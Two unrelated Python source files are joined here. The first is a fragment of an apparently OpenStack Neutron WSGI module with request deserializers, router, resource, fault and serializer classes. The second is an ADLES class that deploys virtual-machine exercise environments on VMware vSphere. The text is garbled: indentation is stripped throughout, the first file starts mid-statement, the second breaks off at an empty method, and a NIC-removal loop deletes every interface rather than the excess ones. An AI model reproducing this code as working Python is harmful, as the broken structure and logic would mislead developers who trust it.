'application/json': JSONDeserializer(),
}
self.body_deserializers.update(body_deserializers or {})
self.headers_deserializer = (headers_deserializer or
RequestHeadersDeserializer())
def deserialize(self, request):
"""Extract necessary pieces of the request.
:param request: Request object
:returns tuple of expected controller action name, dictionary of
keyword arguments to pass to the controller, the expected
content type of the response
"""
action_args = self.get_action_args(request.environ)
action = action_args.pop('action', None)
action_args.update(self.deserialize_headers(request, action))
action_args.update(self.deserialize_body(request, action))
accept = self.get_expected_content_type(request)
return (action, action_args, accept)
def deserialize_headers(self, request, action):
return self.headers_deserializer.deserialize(request, action)
def deserialize_body(self, request, action):
try:
content_type = request.best_match_content_type()
except exception.InvalidContentType:
LOG.debug("Unrecognized Content-Type provided in request")
return {}
if content_type is None:
LOG.debug("No Content-Type provided in request")
return {}
if not len(request.body) > 0:
LOG.debug("Empty body provided in request")
return {}
try:
deserializer = self.get_body_deserializer(content_type)
except exception.InvalidContentType:
with excutils.save_and_reraise_exception():
LOG.debug("Unable to deserialize body as provided "
"Content-Type")
return deserializer.deserialize(request.body, action)
def get_body_deserializer(self, content_type):
try:
return self.body_deserializers[content_type]
except (KeyError, TypeError):
raise exception.InvalidContentType(content_type=content_type)
def get_expected_content_type(self, request):
return request.best_match_content_type()
def get_action_args(self, request_environment):
"""Parse dictionary created by routes library."""
try:
args = request_environment['wsgiorg.routing_args'][1].copy()
except Exception:
return {}
try:
del args['controller']
except KeyError:
pass
try:
del args['format']
except KeyError:
pass
return args
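# Example (illustrative sketch): extracting the action and keyword arguments
# from a routed request.  The environ below mirrors what the routes library
# stores under 'wsgiorg.routing_args'; the specific values are hypothetical.
#
#     deserializer = RequestDeserializer()
#     environ = {'wsgiorg.routing_args': (None, {'controller': object(),
#                                                'action': 'show',
#                                                'id': 'net-1',
#                                                'format': 'json'})}
#     deserializer.get_action_args(environ)
#     # -> {'action': 'show', 'id': 'net-1'}
#     # ('controller' and 'format' are stripped before the controller method
#     #  is dispatched; deserialize() later pops 'action' as well)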
class Application(object):
"""Base WSGI application wrapper. Subclasses need to implement __call__."""
@classmethod
def factory(cls, global_config, **local_config):
"""Used for paste app factories in paste.deploy config files.
Any local configuration (that is, values under the [app:APPNAME]
section of the paste config) will be passed into the `__init__` method
as kwargs.
A hypothetical configuration would look like:
[app:wadl]
latest_version = 1.3
paste.app_factory = nova.api.fancy_api:Wadl.factory
which would result in a call to the `Wadl` class as
import neutron.api.fancy_api
fancy_api.Wadl(latest_version='1.3')
        You could of course re-implement the `factory` method in subclasses,
        but thanks to the kwarg passing it shouldn't be necessary.
"""
return cls(**local_config)
def __call__(self, environ, start_response):
r"""Subclasses will probably want to implement __call__ like this:
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
# Any of the following objects work as responses:
# Option 1: simple string
res = 'message\n'
# Option 2: a nicely formatted HTTP exception page
res = exc.HTTPForbidden(explanation='Nice try')
# Option 3: a webob Response object (in case you need to play with
# headers, or you want to be treated like an iterable, or or or)
res = Response();
res.app_iter = open('somefile')
# Option 4: any wsgi app to be run next
res = self.application
# Option 5: you can get a Response object for a wsgi app, too, to
# play with headers etc
res = req.get_response(self.application)
# You can then just return your response...
return res
# ... or set req.response and return None.
req.response = res
See the end of http://pythonpaste.org/webob/modules/dec.html
for more info.
"""
raise NotImplementedError(_('You must implement __call__'))
class Debug(Middleware):
"""Middleware for debugging.
Helper class that can be inserted into any WSGI application chain
to get information about the request and response.
"""
@webob.dec.wsgify
def __call__(self, req):
print(("*" * 40) + " REQUEST ENVIRON")
for key, value in req.environ.items():
print(key, "=", value)
print()
resp = req.get_response(self.application)
print(("*" * 40) + " RESPONSE HEADERS")
for (key, value) in resp.headers.iteritems():
print(key, "=", value)
print()
resp.app_iter = self.print_generator(resp.app_iter)
return resp
@staticmethod
def print_generator(app_iter):
"""Print contents of a wrapper string iterator when iterated."""
print(("*" * 40) + " BODY")
for part in app_iter:
sys.stdout.write(part)
sys.stdout.flush()
yield part
print()
class Router(object):
"""WSGI middleware that maps incoming requests to WSGI apps."""
@classmethod
def factory(cls, global_config, **local_config):
"""Return an instance of the WSGI Router class."""
return cls()
def __init__(self, mapper):
"""Create a router for the given routes.Mapper.
Each route in `mapper` must specify a 'controller', which is a
WSGI app to call. You'll probably want to specify an 'action' as
        well and have your controller be a wsgi.Controller, which will route
the request to the action method.
Examples:
mapper = routes.Mapper()
sc = ServerController()
# Explicit mapping of one route to a controller+action
mapper.connect(None, "/svrlist", controller=sc, action="list")
# Actions are all implicitly defined
mapper.resource("network", "networks", controller=nc)
# Pointing to an arbitrary WSGI app. You can specify the
# {path_info:.*} parameter so the target app can be handed just that
# section of the URL.
mapper.connect(None, "/v1.0/{path_info:.*}", controller=BlogApp())
"""
self.map = mapper
self._router = routes.middleware.RoutesMiddleware(self._dispatch,
self.map)
@webob.dec.wsgify
def __call__(self, req):
"""Route the incoming request to a controller based on self.map.
If no match, return a 404.
"""
return self._router
@staticmethod
@webob.dec.wsgify(RequestClass=Request)
def _dispatch(req):
"""Dispatch a Request.
Called by self._router after matching the incoming request to a route
and putting the information into req.environ. Either returns 404
or the routed WSGI app's response.
"""
match = req.environ['wsgiorg.routing_args'][1]
if not match:
language = req.best_match_language()
msg = _('The resource could not be found.')
msg = i18n.translate(msg, language)
return webob.exc.HTTPNotFound(explanation=msg)
app = match['controller']
return app
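# Example (illustrative sketch): factory() above instantiates the router with
# no arguments, so concrete routers typically build their own mapper and pass
# it to the base __init__.  APIRouter and NetworksController are hypothetical.
#
#     class APIRouter(Router):
#         def __init__(self):
#             mapper = routes.Mapper()
#             mapper.connect(None, "/networks",
#                            controller=NetworksController(), action="index")
#             super(APIRouter, self).__init__(mapper)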
class Resource(Application):
"""WSGI app that handles (de)serialization and controller dispatch.
WSGI app that reads routing information supplied by RoutesMiddleware
and calls the requested action method upon its controller. All
controller action methods must accept a 'req' argument, which is the
incoming wsgi.Request. If the operation is a PUT or POST, the controller
method must also accept a 'body' argument (the deserialized request body).
They may raise a webob.exc exception or return a dict, which will be
serialized by requested content type.
"""
def __init__(self, controller, fault_body_function,
deserializer=None, serializer=None):
"""Object initialization.
        :param controller: object that implements methods created by routes lib
        :param deserializer: object that can deserialize a webob request
                             into necessary pieces
        :param serializer: object that can serialize the output of a
                           controller into a webob response
:param fault_body_function: a function that will build the response
body for HTTP errors raised by operations
on this resource object
"""
self.controller = controller
self.deserializer = deserializer or RequestDeserializer()
self.serializer = serializer or ResponseSerializer()
self._fault_body_function = fault_body_function
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, request):
"""WSGI method that controls (de)serialization and method dispatch."""
LOG.info(_LI("%(method)s %(url)s"),
{"method": request.method, "url": request.url})
try:
action, args, accept = self.deserializer.deserialize(request)
except exception.InvalidContentType:
msg = _("Unsupported Content-Type")
LOG.exception(_LE("InvalidContentType: %s"), msg)
return Fault(webob.exc.HTTPBadRequest(explanation=msg))
except exception.MalformedRequestBody:
msg = _("Malformed request body")
LOG.exception(_LE("MalformedRequestBody: %s"), msg)
return Fault(webob.exc.HTTPBadRequest(explanation=msg))
try:
action_result = self.dispatch(request, action, args)
except webob.exc.HTTPException as ex:
LOG.info(_LI("HTTP exception thrown: %s"), ex)
action_result = Fault(ex, self._fault_body_function)
except Exception:
LOG.exception(_LE("Internal error"))
# Do not include the traceback to avoid returning it to clients.
action_result = Fault(webob.exc.HTTPServerError(),
self._fault_body_function)
if isinstance(action_result, dict) or action_result is None:
response = self.serializer.serialize(action_result,
accept,
action=action)
else:
response = action_result
try:
LOG.info(_LI("%(url)s returned with HTTP %(status)d"),
dict(url=request.url, status=response.status_int))
except AttributeError as e:
LOG.info(_LI("%(url)s returned a fault: %(exception)s"),
dict(url=request.url, exception=e))
return response
def dispatch(self, request, action, action_args):
"""Find action-spefic method on controller and call it."""
controller_method = getattr(self.controller, action)
try:
            # NOTE(salvatore-orlando): the controller method must have
            # an argument whose name is 'request'
return controller_method(request=request, **action_args)
except TypeError as exc:
LOG.exception(exc)
return Fault(webob.exc.HTTPBadRequest())
def _default_body_function(wrapped_exc):
code = wrapped_exc.status_int
fault_data = {
'Error': {
'code': code,
'message': wrapped_exc.explanation}}
# 'code' is an attribute on the fault tag itself
metadata = {'attributes': {'Error': 'code'}}
return fault_data, metadata
class Fault(webob.exc.HTTPException):
"""Generates an HTTP response from a webob HTTP exception."""
def __init__(self, exception, body_function=None):
"""Creates a Fault for the given webob.exc.exception."""
self.wrapped_exc = exception
self.status_int = self.wrapped_exc.status_int
self._body_function = body_function or _default_body_function
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Generate a WSGI response based on the exception passed to ctor."""
# Replace the body with fault details.
fault_data, metadata = self._body_function(self.wrapped_exc)
content_type = req.best_match_content_type()
serializer = {
'application/json': JSONDictSerializer(),
}[content_type]
self.wrapped_exc.body = serializer.serialize(fault_data)
self.wrapped_exc.content_type = content_type
return self.wrapped_exc
# NOTE(salvatore-orlando): this class will go once the
# extension API framework is updated
class Controller(object):
"""WSGI app that dispatched to methods.
WSGI app that reads routing information supplied by RoutesMiddleware
and calls the requested action method upon itself. All action methods
must, in addition to their normal parameters, accept a 'req' argument
which is the incoming wsgi.Request. They raise a webob.exc exception,
or return a dict which will be serialized by requested content type.
"""
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Call the method specified in req.environ by RoutesMiddleware."""
arg_dict = req.environ['wsgiorg.routing_args'][1]
action = arg_dict['action']
method = getattr(self, action)
del arg_dict['controller']
del arg_dict['action']
if 'format' in arg_dict:
del arg_dict['format']
arg_dict['request'] = req
result = method(**arg_dict)
if isinstance(result, dict) or result is None:
if result is None:
status = 204
content_type = ''
body = None
else:
status = 200
content_type = req.best_match_content_type()
body = self._serialize(result, content_type)
response = webob.Response(status=status,
content_type=content_type,
body=body)
LOG.debug("%(url)s returned with HTTP %(status)d",
dict(url=req.url, status=response.status_int))
return response
else:
return result
def _serialize(self, data, content_type):
"""Serialize the given dict to the provided content_type.
Uses self._serialization_metadata if it exists, which is a dict mapping
MIME types to information needed to serialize to that type.
"""
_metadata = getattr(type(self), '_serialization_metadata', {})
serializer = Serializer(_metadata)
try:
return serializer.serialize(data, content_type)
except exception.InvalidContentType:
msg = _('The requested content type %s is invalid.') % content_type
raise webob.exc.HTTPNotAcceptable(msg)
def _deserialize(self, data, content_type):
"""Deserialize the request body to the specefied content type.
Uses self._serialization_metadata if it exists, which is a dict mapping
MIME types to information needed to serialize to that type.
"""
_metadata = getattr(type(self), '_serialization_metadata', {})
serializer = Serializer(_metadata)
return serializer.deserialize(data, content_type)['body']
# NOTE(salvatore-orlando): this class will go once the
# extension API framework is updated
class Serializer(object):
"""Serializes and deserializes dictionaries to certain MIME types."""
def __init__(self, metadata=None):
"""Create a serializer based on the given WSGI environment.
'metadata' is an optional dict mapping MIME types to information
needed to serialize a dictionary to that type.
"""
self.metadata = metadata or {}
def _get_serialize_handler(self, content_type):
handlers = {
'application/json': JSONDictSerializer(),
}
try:
return handlers[content_type]
except Exception:
raise exception.InvalidContentType(content_type=content_type)
def serialize(self, data, content_type):
"""Serialize a dictionary into the specified content type."""
return self._get_serialize_handler(content_type).serialize(data)
def deserialize(self, datastring, content_type):
"""Deserialize a string to a dictionary.
The string must be in the format of a supported MIME type.
"""
try:
return self.get_deserialize_handler(content_type).deserialize(
datastring)
except Exception:
raise webob.exc.HTTPBadRequest(_("Could not deserialize data"))
def get_deserialize_handler(self, content_type):
handlers = {
'application/json': JSONDeserializer(),
}
try:
return handlers[content_type]
except Exception:
raise exception.InvalidContentType(content_type=content_type)
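# Example (illustrative sketch): round-tripping a dict through the legacy
# Serializer above.  The payload is made up for demonstration purposes only.
#
#     s = Serializer()
#     body = s.serialize({'network': {'id': 'net-1'}}, 'application/json')
#     s.deserialize(body, 'application/json')
#     # -> {'body': {'network': {'id': 'net-1'}}}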
|
|
import logging
import os
from adles.interfaces import Interface
from adles.utils import get_vlan, pad, read_json
from adles.vsphere import Vsphere
from adles.vsphere.folder_utils import format_structure
from adles.vsphere.network_utils import create_portgroup
from adles.vsphere.vm import VM
from adles.vsphere.vsphere_utils import VsphereException, is_folder, is_vm
class VsphereInterface(Interface):
"""Generic interface for the VMware vSphere platform."""
def __init__(self, infra, spec):
"""
.. warning:: The infrastructure and spec are assumed to be valid,
therefore checks on key existence and types are NOT performed
for REQUIRED elements.
:param dict infra: Infrastructure information
:param dict spec: The parsed exercise specification
"""
super(VsphereInterface, self).__init__(infra=infra, spec=spec)
self._log = logging.getLogger(str(self.__class__))
self._log.debug("Initializing %s", self.__class__)
self.master_folder = None
self.template_folder = None
# Used to do lookups of Generic networks during deployment
self.net_table = {}
# Cache containing Master instances (TODO: potential naming conflicts)
self.masters = {}
if "thresholds" in infra:
self.thresholds = infra["thresholds"]
else:
self.thresholds = {
"folder": {
"warn": 25,
"error": 50},
"service": {
"warn": 50,
"error": 70}
}
# Read infrastructure login information
if "login-file" in infra:
logins = read_json(infra["login-file"])
else:
self._log.warning("No login-file specified, "
"defaulting to user prompts...")
logins = {}
# Instantiate the vSphere vCenter server instance class
self.server = Vsphere(username=logins.get("user"),
password=logins.get("pass"),
hostname=infra.get("hostname"),
port=int(infra.get("port")),
datastore=infra.get("datastore"),
datacenter=infra.get("datacenter"))
# Acquire ESXi hosts
if "hosts" in infra:
hosts = infra["hosts"]
self.host = self.server.get_host(hosts[0])
# Gather all the ESXi hosts
self.hosts = [self.server.get_host(h) for h in hosts]
else:
self.host = self.server.get_host() # First host found in Datacenter
# Instantiate and initialize Groups
self.groups = self._init_groups()
# Set the server root folder
if "server-root" in infra:
self.server_root = self.server.get_folder(infra["server-root"])
if not self.server_root:
self._log.error("Could not find server-root folder '%s'",
infra["server-root"])
raise VsphereException("Could not find server root folder")
else: # Default to Datacenter VM folder
self.server_root = self.server.datacenter.vmFolder
self._log.info("Server root folder: %s", self.server_root.name)
# Set environment root folder (TODO: this can be consolidated)
if "folder-name" not in self.metadata:
self.root_path, self.root_name = ("", self.metadata["name"])
self.root_folder = self.server_root.traverse_path(self.root_name,
generate=True)
else:
self.root_path, self.root_name = os.path.split(
self.metadata["folder-name"])
self.root_folder = self.server_root.traverse_path(
self.metadata["folder-name"], generate=True)
self._log.debug("Environment root folder name: %s", self.root_name)
if not self.root_folder: # Create if it's not found
parent = self.server_root.traverse_path(self.root_path)
self.root_folder = self.server.create_folder(self.root_name, parent)
if not self.root_folder:
self._log.error("Could not create root folder '%s'",
self.root_name)
raise VsphereException("Could not create root folder")
self._log.info("Environment root folder: %s", self.root_folder.name)
# Set default vSwitch name
if "vswitch" in infra:
self.vswitch_name = infra["vswitch"]
else:
from pyVmomi import vim
self.vswitch_name = self.server.get_item(vim.Network).name
self._log.debug("Finished initializing VsphereInterface")
def _init_groups(self):
"""
Instantiate and initialize Groups.
:return: Initialized Groups
:rtype: dict(:class:`Group`)
"""
from adles.group import Group, get_ad_groups
groups = {}
# Instantiate Groups
for name, config in self.spec["groups"].items():
if "instances" in config: # Template groups
groups[name] = [Group(name, config, i)
for i in range(1, config["instances"] + 1)]
else: # Standard groups
groups[name] = Group(name=name, group=config)
# Initialize Active Directory-type Group user names
ad_groups = get_ad_groups(groups)
for group in ad_groups:
# res = self.server.get_users(belong_to_group=g.ad_group,
# find_users=True)
res = None
if res is not None:
for result in res:
# Reference: pyvmomi/docs/vim/UserSearchResult.rst
if result.group is True:
self._log.error("Result '%s' is not a user",
str(result))
else:
group.users.append(result.principal)
# Set the size, default to 1
group.size = (len(group.users) if len(group.users) > 1 else 1)
else:
self._log.error("Could not initialize AD-group %s",
str(group.ad_group))
if hasattr(self.server.user_dir, "domainList"):
self._log.debug("Domains on server: %s",
str(self.server.user_dir.domainList))
return groups
def create_masters(self):
""" Exercise Environment Master creation phase. """
# Get folder containing templates
self.template_folder = self.server_root.traverse_path(
self.infra["template-folder"])
if not self.template_folder:
self._log.error("Could not find template folder in path '%s'",
self.infra["template-folder"])
return
else:
self._log.debug("Found template folder: '%s'",
self.template_folder.name)
# Create master folder to hold base service instances
self.master_folder = self.root_folder.traverse_path(
self.master_root_name)
if not self.master_folder:
self.master_folder = self.server.create_folder(
self.master_root_name, self.root_folder)
self._log.info("Created Master folder '%s' in '%s'",
self.master_root_name, self.root_name)
# Create networks for master instances
for net in self.networks:
# Iterate through the base network types (unique and generic)
self._create_master_networks(net_type=net, default_create=True)
# Create Master instances
self._master_parent_folder_gen(self.folders, self.master_folder)
# Output fully deployed master folder tree to debugging
self._log.debug(format_structure(self.root_folder.enumerate()))
def _master_parent_folder_gen(self, folder, parent):
"""
Generates parent-type Master folders.
:param dict folder: Dict with the folder tree structure as in spec
:param parent: Parent folder
:type parent: vim.Folder
"""
skip_keys = ["instances", "description", "enabled"]
if not self._is_enabled(folder): # Check if disabled
self._log.warning("Skipping disabled parent-type folder %s",
parent.name)
return
# We have to check every item, as they could be keywords or sub-folders
for sub_name, sub_value in folder.items():
if sub_name in skip_keys:
# Skip configurations that are not relevant
continue
elif sub_name == "group":
pass # group = self._get_group(sub_value)
elif sub_name == "master-group":
pass # master_group = self._get_group(sub_value)
else:
folder_name = self.master_prefix + sub_name
new_folder = self.server.create_folder(folder_name,
create_in=parent)
if "services" in sub_value: # It's a base folder
if self._is_enabled(sub_value):
self._log.info("Generating Master base-type folder %s",
sub_name)
self._master_base_folder_gen(sub_name, sub_value,
new_folder)
else:
self._log.warning("Skipping disabled "
"base-type folder %s", sub_name)
else: # It's a parent folder, recurse
if self._is_enabled(sub_value):
self._master_parent_folder_gen(sub_value,
parent=new_folder)
self._log.info("Generating Master "
"parent-type folder %s", sub_name)
else:
self._log.warning("Skipping disabled "
"parent-type folder %s", sub_name)
def _master_base_folder_gen(self, folder_name, folder_dict, parent):
"""
Generates base-type Master folders.
:param str folder_name: Name of the base folder
:param dict folder_dict: Dict with the base folder tree as in spec
:param parent: Parent folder
:type parent: vim.Folder
"""
# Set the group to apply permissions for
# if "master-group" in folder_dict:
# master_group = self._get_group(folder_dict["master-group"])
# else:
# master_group = self._get_group(folder_dict["group"])
# Create Master instances
for sname, sconfig in folder_dict["services"].items():
if not self._is_vsphere(sconfig["service"]):
self._log.debug("Skipping non-vsphere service '%s'", sname)
continue
self._log.info("Creating Master instance '%s' from service '%s'",
sname, sconfig["service"])
vm = self._create_service(parent, sconfig["service"],
sconfig["networks"])
if vm is None:
self._log.error("Failed to create Master instance '%s' "
"in folder '%s'", sname, folder_name)
continue # Skip to the next service
def _create_service(self, folder, service_name, networks):
"""
Retrieves and clones a service into a master folder.
:param folder: Folder to create service in
:type folder: vim.Folder
:param str service_name: Name of the service to clone
:param list networks: Networks to configure the service with
:return: The service VM instance
:rtype: :class:`VM`
"""
if not self._is_vsphere(service_name):
self._log.debug("Skipping non-vsphere service '%s'", service_name)
return None
config = self.services[service_name]
vm_name = self.master_prefix + service_name
test = folder.traverse_path(vm_name) # Check service already exists
if test is None:
# Find the template that matches the service definition
template = self.template_folder.traverse_path(config["template"])
if not template:
self._log.error("Could not find template '%s' for service '%s'",
config["template"], service_name)
return None
self._log.info("Creating service '%s'", service_name)
vm = VM(name=vm_name, folder=folder,
resource_pool=self.server.get_pool(),
datastore=self.server.datastore, host=self.host)
if not vm.create(template=template):
return None
else:
self._log.warning("Service %s already exists", service_name)
vm = VM(vm=test)
if vm.is_template(): # Check if it's been converted already
self._log.warning("Service %s is a Template, "
"skipping configuration", service_name)
return vm
# Resource configurations (minus storage currently)
if "resource-config" in config:
vm.edit_resources(**config["resource-config"])
if "note" in config: # Set VM note if specified
vm.set_note(config["note"])
# NOTE: management interfaces matter here!
# (If implemented with Monitoring extensions)
self._configure_nics(vm, networks=networks) # Configure VM NICs
# Post-creation snapshot
vm.create_snapshot("Start of Mastering",
"Beginning of Mastering phase for exercise %s",
self.metadata["name"])
return vm
def _create_master_networks(self, net_type, default_create):
"""
Creates a network as part of the Master creation phase.
:param str net_type: Top-level type of the network
(unique | generic | base)
:param bool default_create: Whether to create networks
if they don't already exist
"""
# Pick up any recent changes to the host's network status
self.host.configManager.networkSystem.RefreshNetworkSystem()
self._log.info("Creating %s", net_type)
for name, config in self.networks[net_type].items():
exists = self.server.get_network(name)
if exists:
self._log.info("PortGroup '%s' already exists on host '%s'",
name, self.host.name)
else: # NOTE: if monitoring, we want promiscuous=True
self._log.warning("PortGroup '%s' does not exist on host '%s'",
name, self.host.name)
if default_create:
self._log.info("Creating portgroup '%s' on host '%s'",
name, self.host.name)
create_portgroup(name=name, host=self.host,
promiscuous=False,
vlan=int(config.get("vlan",
next(get_vlan()))),
vswitch_name=config.get("vswitch",
self.vswitch_name))
def _configure_nics(self, vm, networks, instance=None):
"""
Configures Virtual Network Interfaces Cards (vNICs)
for a service instance.
:param vm: Virtual Machine to configure vNICs on
:type vm: vim.VirtualMachine
:param list networks: List of networks to configure
:param int instance: Current instance of a folder
for Deployment purposes
"""
self._log.info("Editing NICs for VM '%s'", vm.name)
num_nics = len(list(vm.network))
num_nets = len(networks)
nets = networks # Copy the passed variable so we can edit it later
# Ensure number of NICs on VM
# matches number of networks configured for the service
#
# Note that monitoring interfaces will be
# counted and included in the networks list
if num_nics > num_nets: # Remove excess interfaces
diff = int(num_nics - num_nets)
self._log.debug("VM '%s' has %d extra NICs, removing...",
vm.name, diff)
for _, nic in enumerate(reversed(range(num_nics)), start=1):
vm.remove_nic(nic)
elif num_nics < num_nets: # Create missing interfaces
diff = int(num_nets - num_nics)
self._log.debug("VM '%s' is deficient %d NICs, adding...",
vm.name, diff)
# Add NICs to VM and pop them from the list of networks
for _ in range(diff):
# Select NIC hardware
nic_model = ("vmxnet3" if vm.has_tools() else "e1000")
net_name = nets.pop()
vm.add_nic(network=self.server.get_network(net_name),
model=nic_model, summary=net_name)
# Edit the interfaces
# (NOTE: any NICs added earlier shouldn't be affected by this)
for i, net_name in enumerate(networks, start=1):
# Setting the summary to network name
# allows viewing of name without requiring
# read permissions to the network itself
if instance is not None:
# Resolve generic networks for deployment phase
net_name = self._get_net(net_name, instance)
network = self.server.get_network(net_name)
if vm.get_nic_by_id(i).backing.network == network:
continue # Skip NICs that are already configured
else:
vm.edit_nic(nic_id=i, network=network, summary=net_name)
def deploy_environment(self):
""" Exercise Environment deployment phase """
self.master_folder = self.root_folder.traverse_path(
self.master_root_name)
if self.master_folder is None: # Check if Master folder was found
self._log.error("Could not find Master folder '%s'. "
"Please ensure the Master Creation phase "
"has been run and the folder exists "
"before attempting Deployment",
self.master_root_name)
raise VsphereException("Could not find Master folder")
self._log.debug("Master folder name: %s\tPrefix: %s",
self.master_folder.name, self.master_prefix)
# Verify and convert Master instances to templates
self._log.info("Validating and converting Masters to Templates")
self._convert_and_verify(folder=self.master_folder)
self._log.info("Finished validating "
"and converting Masters to Templates")
self._log.info("Deploying environment...")
self._deploy_parent_folder_gen(spec=self.folders,
parent=self.root_folder,
path="")
self._log.info("Finished deploying environment")
# Output fully deployed environment tree to debugging
self._log.debug(format_structure(self.root_folder.enumerate()))
def _convert_and_verify(self, folder):
"""
Converts Masters to Templates before deployment.
This also ensures they are powered off before being cloned.
:param folder: Folder containing Master instances to convert and verify
:type folder: vim.Folder
"""
self._log.debug("Converting Masters in folder '%s' to templates",
folder.name)
for item in folder.childEntity:
if is_vm(item):
vm = VM(vm=item)
self.masters[vm.name] = vm
if vm.is_template():
# Skip if they already exist from a previous run
self._log.debug("Master '%s' is already a template",
vm.name)
continue
# Cleanly power off VM before converting to template
if vm.powered_on():
vm.change_state("off", attempt_guest=True)
# Take a snapshot to allow reverts to the start of the exercise
vm.create_snapshot("Start of exercise",
"Beginning of deployment phase, "
"post-master configuration")
# Convert Master instance to Template
vm.convert_template()
if not vm.is_template():
self._log.error("Master '%s' did not convert to Template",
vm.name)
else:
self._log.debug("Converted Master '%s' to Template",
vm.name)
elif is_folder(item): # Recurse into sub-folders
self._convert_and_verify(item)
else:
self._log.debug("Unknown item found while "
"templatizing Masters: %s", str(item))
def _deploy_parent_folder_gen(self, spec, parent, path):
"""
Generates parent-type folder trees.
:param dict spec: Dict with folder specification
:param parent: Parent folder
:type parent: vim.Folder
:param str path: Folders path at the current level
"""
skip_keys = ["instances", "description", "master-group", "enabled"]
if not self._is_enabled(spec): # Check if disabled
self._log.warning("Skipping disabled parent-type folder %s",
parent.name)
return
for sub_name, sub_value in spec.items():
if sub_name in skip_keys:
# Skip configurations that are not relevant
continue
elif sub_name == "group": # Configure group
pass # group = self._get_group(sub_value)
else: # Create instances of the parent folder
self._log.debug("Deploying parent-type folder '%s'", sub_name)
num_instances, prefix = self._instances_handler(spec,
sub_name,
"folder")
for i in range(num_instances):
# If prefix is undefined or there's a single instance,
# use the folder's name
instance_name = (sub_name
if prefix == "" or num_instances == 1
else prefix)
# If multiple instances, append padded instance number
instance_name += (pad(i) if num_instances > 1 else "")
# Create a folder for the instance
new_folder = self.server.create_folder(instance_name,
create_in=parent)
if "services" in sub_value: # It's a base folder
if self._is_enabled(sub_value):
self._deploy_base_folder_gen(folder_name=sub_name,
folder_items=sub_value,
parent=new_folder,
path=self._path(
path, sub_name))
else:
self._log.warning("Skipping disabled "
"base-type folder %s", sub_name)
else: # It's a parent folder
if self._is_enabled(sub_value):
self._deploy_parent_folder_gen(parent=new_folder,
spec=sub_value,
path=self._path(
path, sub_name))
else:
self._log.warning("Skipping disabled "
"parent-type folder %s", sub_name)
def _deploy_base_folder_gen(self, folder_name, folder_items, parent, path):
"""
Generates folder tree for deployment stage.
:param str folder_name: Name of the folder
:param dict folder_items: Dict of items in the folder
:param parent: Parent folder
:type parent: vim.Folder
:param str path: Folders path at the current level
"""
# Set the group to apply permissions for
# group = self._get_group(folder_items["group"])
# Check if number of instances for the folder exceeds configured limits
num_instances, prefix = self._instances_handler(folder_items,
folder_name, "folder")
# Create instances
self._log.info("Deploying base-type folder '%s'", folder_name)
for i in range(num_instances):
# If no prefix is defined or there's only a single instance,
# use the folder's name
instance_name = (folder_name
if prefix == "" or num_instances == 1
else prefix)
# If multiple instances, append padded instance number
instance_name += (pad(i) if num_instances > 1 else "")
if num_instances > 1: # Create a folder for the instance
new_folder = self.server.create_folder(instance_name,
create_in=parent)
else: # Don't duplicate folder name for single instances
new_folder = parent
# Use the folder's name for the path,
# as that's what matches the Master version
self._log.info("Generating services for "
"base-type folder instance '%s'", instance_name)
self._deploy_gen_services(services=folder_items["services"],
parent=new_folder,
path=path, instance=i)
def _deploy_gen_services(self, services, parent, path, instance):
"""
Generates the services in a folder.
:param dict services: The "services" dict in a folder
:param parent: Parent folder
:type parent: vim.Folder
:param str path: Folders path at the current level
:param int instance: What instance of a base folder this is
"""
# Iterate through the services
for service_name, value in services.items():
if not self._is_vsphere(value["service"]):
# Ignore non-vsphere services
self._log.debug("Skipping non-vsphere service '%s'",
service_name)
continue
self._log.info("Generating service '%s' in folder '%s'",
service_name, parent.name)
# Check if number of instances for service exceeds configured limits
num_instances, prefix = self._instances_handler(value,
service_name,
"service")
# Get the Master template instance to clone from
master = self.masters.get(self.master_prefix + value["service"],
None)
if master is None: # Check if the lookup was successful
self._log.error("Couldn't find Master for service '%s' "
"in this path:\n%s", value["service"], path)
continue # Skip to the next service
# Clone the instances of the service from the master
for i in range(num_instances):
instance_name = prefix + service_name + (" " + pad(i)
if num_instances > 1
else "")
vm = VM(name=instance_name, folder=parent,
resource_pool=self.server.get_pool(),
datastore=self.server.datastore, host=self.host)
if not vm.create(template=master.get_vim_vm()):
self._log.error("Failed to create instance %s",
instance_name)
else:
self._configure_nics(vm, value["networks"],
instance=instance)
def _is_vsphere(self, service_name):
"""
Checks if a service instance is defined as a vSphere service.
:param str service_name: Name of the service to lookup in
list of defined services
:return: If a service is a vSphere-type service
:rtype: bool
"""
if service_name not in self.services:
self._log.error("Could not find service %s in list of services",
service_name)
elif "template" in self.services[service_name]:
return True
return False
def _get_net(self, name, instance=-1):
"""
Resolves network names. This is mainly to handle generic-type networks.
If a generic network does not exist, it is created and added to
the interface lookup table.
:param str name: Name of the network
:param int instance: Instance number
.. note:: Only applies to generic-type networks
:return: Resolved network name
:rtype: str
"""
net_type = self._determine_net_type(name)
if net_type == "unique-networks":
return name
elif net_type == "generic-networks":
if instance == -1:
self._log.error("Invalid instance for _get_net: %d", instance)
raise ValueError
# Generate full name for the generic network
net_name = name + "-GENERIC-" + pad(instance)
if net_name not in self.net_table:
exists = self.server.get_network(net_name)
if exists is not None:
self._log.debug("PortGroup '%s' already exists "
"on host '%s'", net_name,
self.host.name)
else: # Create the generic network if it does not exist
# WARNING: lookup of name is case-sensitive!
                    # This can (and has) led to bugs
self._log.debug("Creating portgroup '%s' on host '%s'",
net_name,
self.host.name)
vsw = self.networks["generic-networks"][name].get(
"vswitch", self.vswitch_name)
create_portgroup(name=net_name,
host=self.host,
promiscuous=False,
vlan=next(get_vlan()),
vswitch_name=vsw)
# Register the existence of the generic network
self.net_table[net_name] = True
return net_name
else:
self._log.error("Invalid network type %s for network %s",
net_type, name)
raise TypeError
def cleanup_masters(self, network_cleanup=False):
"""
Cleans up any master instances.
:param bool network_cleanup: If networks should be cleaned up
"""
# Get the folder to cleanup in
master_folder = self.root_folder.find_in(self.master_root_name)
self._log.info("Found master folder '%s' under folder '%s', "
"proceeding with cleanup...",
master_folder.name, self.root_folder.name)
# Recursively descend from master folder,
# destroying anything with the prefix
master_folder.cleanup(vm_prefix=self.master_prefix,
recursive=True,
destroy_folders=True,
destroy_self=True)
# Cleanup networks
if network_cleanup:
pass
def cleanup_environment(self, network_cleanup=False):
"""
Cleans up a deployed environment.
:param bool network_cleanup: If networks should be cleaned up
"""
# Get the root environment folder to cleanup in
# enviro_folder = self.root_folder
# Cleanup networks
if network_cleanup:
pass
def __str__(self):
